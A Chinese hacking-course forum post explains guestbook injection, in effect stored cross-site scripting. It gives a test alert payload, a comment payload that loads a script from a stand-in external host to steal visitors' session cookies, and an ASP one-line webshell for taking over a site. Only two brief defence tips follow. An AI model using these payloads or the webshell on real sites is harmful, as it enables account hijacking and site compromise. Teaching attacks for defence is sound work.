设为首页收藏本站 隐藏访客:

零基础学网络技术 - 东方联盟VIP会员专区

 找回密码
 立即注册
查看: 49716|回复: 0

21、网站渗透:留言板注入漏洞的利用原理及防御实战

[复制链接]

178

主题

178

帖子

0

积分

管理员

东方联盟金牌讲师

Rank: 9Rank: 9Rank: 9

积分
0
发表于 2019-9-25 14:21:02 | 显示全部楼层 |阅读模式
主讲老师:郭盛华

注入漏洞:

注入漏洞是因为字符过滤不严谨所造成的,可以得到管理员的账号密码等相关资料。
这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。
当我们想要测试某个站点时,一般会架上注入工具对其狂轰乱炸,这样做虽然有时能找到注入点,但还是有些盲目,我个人的看法是:如果有源码的话,就从源码入手,在源码中查找注入点。对于源码,有些朋友可能觉得很难,其实源码并不神秘,它也是有一定的语法规则的,看一套优秀的源码就像是在欣赏一部精美的电影,只要我们坚持每天看一些优秀源码。


今天就给大家演示一下留言板注入漏洞,利用这个漏洞我们可以获得网站管理帐号和密码。

1、测试注入代码:<script>alert(“看看有漏洞没?")</script>

在留言板输入以上代码,证明没有被过滤,可以利用,继续!

2、添加下面的评论:到此一游,我来评论啦!<script src=“http://www.xxx.com/xxx.js”></script>

原理:在浏览网站时,黑客发现了一个漏洞,该漏洞允许HTML标签嵌入网站的评论部分。嵌入式标签成为页面的永久功能,每当页面打开时,浏览器就会用源代码的其余部分解析它们。

从这一点开始,每次访问页面时,评论中的HTML标签都会激活托管在另一个站点上的JavaScript文件,并且能够窃取访问者的会话cookie。
使用会话cookie,攻击者可以危害访问者的账户,使他能够轻松访问他的个人信息和信用卡数据等等。

没有过滤的留言板很危险,我们除了往数据库添加一些恶意代码,还能查看数据库中敏感信息,写入一句话木马,从而控制整个网站。

ASP的一句话特征: <%eval request ("pass")%>

如何防范:

1、过滤HTML等代码
2、加入防注入代码

具体请看视频教程:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
东方联盟,零基础学网络技术!www.Vm888.Com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|东方联盟网 ( 粤ICP备19097316号 )

GMT+8, 2021-3-3 18:52 , Processed in 0.065290 second(s), 20 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表